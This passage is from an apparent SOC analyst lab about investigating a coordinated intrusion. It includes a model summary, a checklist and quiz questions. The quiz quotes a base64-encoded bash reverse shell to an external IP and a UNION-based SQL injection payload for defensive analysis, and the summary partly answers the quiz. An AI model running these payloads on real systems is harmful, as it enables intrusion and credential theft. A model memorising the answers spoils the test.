  5. What are your containment recommendations? (Immediate actions)

Model Analyst Summary:

Three IPs (185.220.101.42, 91.234.99.87, 203.0.113.50) conducted a coordinated multi-stage attack against both Linux and Windows systems. The SSH brute force from 185.220.101.42 served as initial reconnaissance. The Windows brute force from 91.234.99.87 achieved account compromise (4624 from EVIL-PC). SQL injection from 203.0.113.50 exploited the web application, leading to web shell deployment and sudo escalation. The final reverse shell connected back to 185.220.101.42, confirming this IP as the C2 server and linking all phases to a single threat actor. Severity: Critical. Immediate containment: block all three IPs at the firewall, rotate the Administrator password, revoke www-data sudo privileges, and take linux-web-01 offline for forensic imaging.


Deliverable Checklist

Before completing the lab, ensure you have:

  • Event 1 Notes: Windows 4625 with subStatus decoded and IP enriched
  • Event 2 Notes: Windows 4624 with workstation name analysis and comparison to legitimate logons
  • Event 3 Notes: Full sudo escalation chain documented with ATT&CK mapping
  • Event 4 Notes: SQL injection payloads analyzed with tool identification
  • Event 5 Notes: Base64 decoded with CyberChef, C2 IP enriched
  • Attack Narrative: Complete timeline connecting all 5 events with verdict and recommendations

Lab Challenge: Log Source Deep Dive

10 questions · 70% to pass

1. In the Windows 4625 events from 91.234.99.87, the subStatus code is 0xc000006a. What does this specific code reveal about the attacker's progress?

2. What is the workstationName in the Windows 4624 (successful logon) event from 91.234.99.87, and why is this field forensically significant?

3. When decoding the base64 string YmFzaCAtaSA+JiAvZGV2L3RjcC8xODUuMjIwLjEwMS40Mi80NDQ1IDA+JjE= in CyberChef, what C2 port does the reverse shell connect to?

4. The SQL injection events reveal the attacker used an automated tool. What User-Agent string identifies this tool, and what version is it?

5. In the www-data sudo escalation chain, what is the SECOND command executed and what credential data does it target?

6. What critical evidence links the SSH brute force at the start of the attack to the reverse shell at the end?

7. The Windows 4624 event has logonType 3. In the context of this investigation, what does Logon Type 3 mean and why does it matter?

8. In the SQL injection events, the attacker progressed from a GET request to a POST request. What does the POST payload admin' UNION SELECT password FROM users-- specifically attempt to do?

9. How many distinct external attacker IPs are involved in this multi-stage attack? List them by their roles.

10. Based on the complete attack timeline, what is the total elapsed time from the first attack event (SSH brute force) to the final event (reverse shell), and which IMMEDIATE containment action should an analyst prioritize FIRST?
